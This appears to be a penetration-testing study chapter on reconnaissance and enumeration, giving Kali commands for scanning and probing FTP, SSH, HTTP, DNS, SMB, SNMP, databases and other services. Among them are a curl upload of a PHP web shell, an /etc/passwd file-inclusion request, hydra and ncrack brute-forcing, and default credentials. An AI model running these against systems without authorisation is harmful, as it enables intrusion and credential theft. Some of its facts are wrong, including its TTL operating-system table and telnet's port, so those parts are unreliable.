Chapter 2 - Recon & Enumeration

Information Gathering

Resources

Recon-ng Tutorial

Basic Information

Kali> whois domain.com
Kali> dig {a|txt|ns|mx} domain.com
Kali> dig {a|txt|ns|mx} domain.com @ns1.domain.com

Email

Kali> simplyemail.py -all -e domain.com

Initial Discovery

Resources

NMAP: A Practical Guide

NMAP: Scanning the Internet

Massively Scaling your Scans

Finger Printing

Banner Grabbing

Kali> nc -v $TARGET 80
Kali> telnet $TARGET 80
Kali> amap -bqv1 1-65535 $TARGET

TTL Fingerprinting

TTL can help us determine the operating system of the target machine. In a basic ping command, an output would look similar to the following:

> ping 10.10.10.10

PING 10.10.10.10 (10.10.10.10) 56(84) bytes of data.
64 bytes from 10.10.10.10: icmp_seq=1 ttl=127 time=88.4 ms

The TTL drops 1 each time it passes through a router. If in the above example the ttl=127, then it is safe to assume (from this information alone) that the host, 10.10.10.10, is a Linux host.

TTL table and thier operating system listed below.

Operating System	TTL
Windows	128
Solaris	225
Cisco	225

Probing Neighbors

# IPV4/IPV6
Kali> netdiscover -i eth0

# IPV6
Kali> ping6 ff02::1%eth0

Network Scan

Kali> nmap -sn 192.168.1.0/24
Kali> nmap -sP 192.168.1.0/2
Kali> for ip in $(cat targets.txt);do nmap -A -T4 -oN scans/nmap.$ip.txt $ip;done

UDP Scan

UDP-Protocol-Scanner

# Port Scan
udp-protocol-scanner.pl -f ips.txt

# Protocol specific scan
udp-protocol-scanner -p ntp -f ips.txt

Netcat

# UDP (ICMP Error -> Port Closed)
Kali> nc -nv -u -z -w 1 host 160-162

NMAP

Kali> sudo nmap -sU -A -T3 --top-ports 100 10.10.10.24

TCP Scan

Netcat

Kali> nc -nvv -w 1 -z host 1000-2000

NMAP

Kali> nmap -p 1-65535 -sV -sS -T4 $TARGET
Kali> nmap -v -sS -A -T4 $TARGET
Kali> nmap -v -sV -O -sS -T4 $TARGET

Masscan

A Masscan Tutorial and Primer

Enumeration

FTP - 21 (TFTP - 69 UDP)

# NMAP all ftp script check against FTP 21
# scripts located in /usr/share/nmap/scripts/
Kali> nmap --script=ftp-anon.nse,ftp-bounce.nse,ftp-brute.nse,ftp-libopie.nse,ftp-proftpd-backdoor.nse,ftp-syst.nse,ftp-vsftpd-backdoor.nse,ftp-vuln-cve2010-4221.nse,tftp-enum.nse -p 21 $TARGET

# Check for anonymous access
Kali> ftp $targetip
Kali> Username: anonymous
Kali> Password: anything

SSH - 22 TCP

NMAP all ssh scripts against SSH 22
scripts located in /usr/share/nmap/scripts/

Kali> nmap --script=ssh2-enum-algos.nse,ssh-auth-methods.nse,ssh-brute.nse,ssh-hostkey.nse,ssh-publickey-acceptance.nse,ssh-run.nse,sshv1.nse -p 22 $TARGET

Telnet - 25 TCP

Kali> nmap -p 23 --script telnet-ntlm-info $TARGET

# Brute force
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt $TARGET telnet

HTTP - 80 TCP / 8080

Check source code.

Banner Checking

If an NMAP script returns back a banner, google it to see what app it may belong to.

Kali> nmap -v -sC -sV $TARGET
Nmap scan report for $TARGET
...
8080/tcp open   upnp    Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|       Basic realm=Windows Device Portal

The http banner in the example NMAP scan above is Windows Device Portal.

CMSHunter

CMS-Hunter - GitHub

Directory Fuzzing

Kali> dirb http://$TARGET /usr/share/wordlists/dirb/big.txt -o dirb.txt
Kali> dirb http://$TARGET -r -o dirb-$TARGET.txt

Kali> gobuster -u http://$TARGET -w /usr/share/wordlists/dirb/big.txt -t 100
Kali> gobuster -u http://$TARGET -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

# A little for loop so you can go do other stuff
Kali> for wordlist in $(ls);do gobuster -u http://$TARGET -w $wordlist -t 100;done

# dirsearch is fairly good
Kali> dirsearch -u http://$TARGET -e php

cURL

# Robots can give us a clue as to where to look next you may have to send a user agent
Kali> curl -s http://$TARGET/robots.txt

# Check all the methods
Kali> curl -vX OPTIONS $TARGET

# Get header
Kali> curl -i $TARGET

# Get everything
Kali> curl -i -L $TARGET

# Check for title and all links
Kali> curl $TARGET -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Look at page with just text
Kali> curl $TARGET -s -L | html2text -width '99' | uniq

# Check if it is possible to upload
Kali> curl -v -X OPTIONS http://$TARGET/
Kali> curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://$TARGET/test/shell.php

LFI/RFI

# FIMAP
Kali> fimap -u "http://$TARGET/example.php?test="

# cURL
Kali> curl -s http://$TARGET/gallery.php?page=/etc/passwd

# kadimus
Kali> /root/Tools/Kadimus/kadimus -u http://$TARGEET/example.php?page=

WPScan

(vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)

Kali> wpscan --url http://$TARGET
Kali> wpscan --url http://$TARGET --enumerate vp
Kali> wpscan --url http://$TARGET --enumerate vt
Kali> wpscan --url http://$TARGET --enumerate u

Joomscan

Kali> joomscan -u  http://$TARGET 
Kali> joomscan -u  http://$TARGET --enumerate-components

Nikto

# Basic
Kali> nikto -h http://$TARGET

# Include specific tuning, see further below
Kali> nikto -Tuning x 6 -h http://$TARGET

        0 - File Upload

        1 - Interesting File / Seen in logs

        2 - Misconfiguration / Default File

        3 - Information Disclosure

        4 - Injection (XSS/Script/HTML)

        5 - Remote File Retrieval - Inside Web Root

        6 - Denial of Service

        7 - Remote File Retrieval - Server Wide

        8 - Command Execution / Remote Shell

        9 - SQL Injection

        a - Authentication Bypass

        b - Software Identification

        c - Remote Source Inclusion

        x - Reverse Tuning Options (i.e., include all except specified)

BurpSuite

I don't care who you are or what you're doing but it's time to go poke the website with burp. Play with all the things, get params, post params, cookies, user agents, referrers in fact all the headers, change get requests to posts, take note of all error codes, fuzz parameter values, and names, etc.

SSL

Kali> ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $TARGET
Kali> sslscan $TARGET:443

DNS - 53 TCP/UDP

Zone Transfer

Kali> host -l megacorpon.com ns1.megacorpone.com
Kali> dnsrecon -d domain.com -t axfr @ns1.domain.com
Kali> dnsenum domain.com
Kali> nslookup -> set type=any -> ls -d domain.com

Enumerate Subdomains

Kali> for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done
Kali> dnsrecon -d $TARGET -D wordlist.txt -t std --xml output.xml

POP3 - 110 TCP

# Connect
Kali> telnet $TARGET 110

# Login
USER pelle@$TARGET
PASS admin

# or
USER pelle
PASS admin

# List all emails
list

# Retrieve email number 5, for example
retr 9

DATABASES

MSSQL - 1433

Kali> nmap -sU --script=ms-sql-info $TARGET

# Log in to mssql
Kali> sqsh -S $TARGET -U sa

# Execute commands
mssql> xp_cmdshell 'date'
mssql> go

ORACLE - 1521

# Check version or status of host specified
Kali> tnscmd10g version -h $TARGET
Kali> tnscmd10g status -h $TARGET

ORACLE XML DB

# Probable default creds
sys:sys
scott:tiger

[RESOURCES]
Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

MySQL - 3306

# Connect to instance 
mysql --host=$TARGET -u root -p

# NMAP #note:this command might overload the target and it will appear as if it's down. Give it some time.
Kali> nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $TARGET -p 3306

# Configuration location
/var/www/html/configuration.php

LDAP - 389/636(ssl)

Resources

Understanding the LDAP

Kali> ldapsearch -h $TARGET -p 389 -x -b "dc=mywebsite,dc=com"

Cups - 631 TCP

Common UNIX Printing System has become the standard for sharing printers on a linux-network. You will often see port 631 open in your priv-esc enumeration when you run netstat. You can log in to it here: http://localhost:631/admin

You authenticate with the OS-users. Find version. Test cups-config --version. If this does not work surf to http://localhost:631/printers and see the CUPS version in the title bar of your browser.

There are vulnerabilities for it so check your searchsploit.

NFS - 2049

Kali> showmount -e $TARGET

# If you find anything you can mount it like this:
Kali> mount $TARGET:/ /tmp/NFS
Kali> mount -t $TARGET:/ /tmp/NFS

RPC

Examples

Kali> rpcinfo -p $TARGET

RPCBind

Kali> rpcbind -p 192.168.1.101

RDP - 3389

Examples

# Connect to instance
Kali> rdesktop -u admin -p password $TARGET

# Test logging in to see what OS is running
Kali> rdesktop -u guest -p guest $TARGET -g 94%

# Brute force logins for User with password list
Kali> ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://$TARGET

SAMBA/SMB/Netbios - 137,138 UDP 139,445 TCP

Resources

Plundering Windows accounts through authenticated SMB sessions

Hacking windows shares through Samba with Linux

Examples

# Fingerprint version
Kali> smbclient -L //$TARGET

# TODO
Kali> nmblookup -A $TARGET

# null Session
Kali> rpcclient -v "" $TARGET
Kali> rpcclient -U "" 192.168.1.101
Kali> smbclient -L //$TARGET

# Minimal Scan
Kali> enum4linux $TARGET

# Scan Everything
Kali> enum4linux -a $TARGET

# discover windows/samba on subnet find macs and netbios name/domain
Kali> nbtscan 192.168.1.0/24

# Find open shares
Kali> nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24   
Kali> Showmount -e $TARGET/<port>

# Investigate share
Kali> smblookup -A $TARGET smbclient //MOUNT/share -I $TARGET -N

# Enumerate users
Kali> nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.0/24
Kali> python /usr/share/doc/python-impacket-doc/examples/samrdump.py $TARGET

# RID Cycling (500 = admin, 501 = Guest)
Kali> ridenum.py $TARGET 500 50000 /path/to/wordlist.txt

# NBTScan-Unixwiz
Kali> nbtscan-unixwiz -f $TARGET

# Mount Linux/Windows
Kali> mount $TARGET:/vol/share /mnt/nfs
Kali> Mount -t cifs //<server ip>/<share> <local dir> -o username=”guest”,password=””
C:\>net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no

Resources

NBTScan Cheatsheet

TechNet NBTStat Reference

Examples

# Sometimes shows logged in users/addresses
Kali> nbtscan $TARGET -R 54

# NMAP
Kali> nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse $TARGET -p 445

SMTP - 25 TCP

VRFY username (verifies if username exists – enumeration of accounts)
EXPN username (verifies if username is valid – enumeration of accounts)

# Other commands
HELO - 
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.

# NMAP all smtp scripts   
Kali> nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $TARGET

# Check for users (requires txt list of users.txt)
Kali> for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 <$TARGET> 25 2>/dev/null | grep ^"250";done

SNMP - 161/162 UDP

Resources

What is SNMP?

How to get IPv6 Address through SNMP

SNMPv3Enum

SNMP Enumeration

Examples

# Overview
Default Community Names:
public, private, cisco, manager

Enumerate MIB:
1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs
1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User Accounts
1.3.6.1.2.1.6.13.1.3 TCP Local Ports

# Enmerate users from SNMP
Kali> snmpwalk public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d” “ -f4
Kali> python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP $TARGET

# Search SNMP with nmap
Kali> nmap -sT -p 161 192.168.1.0/24 -oG snmp_results.txt

# Examples
Kali> snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2
Kali> onesixtyone -c community -I $TARGET
Kali> snmpcheck -t $TARGET
Kali> snmpenum -t $TARGET

# Version3
Kali> nmap -sV -p 161 --script=snmp-info 192.168.1.0/24
Kali> nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $TARGET

# Wordlists
Kali> /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt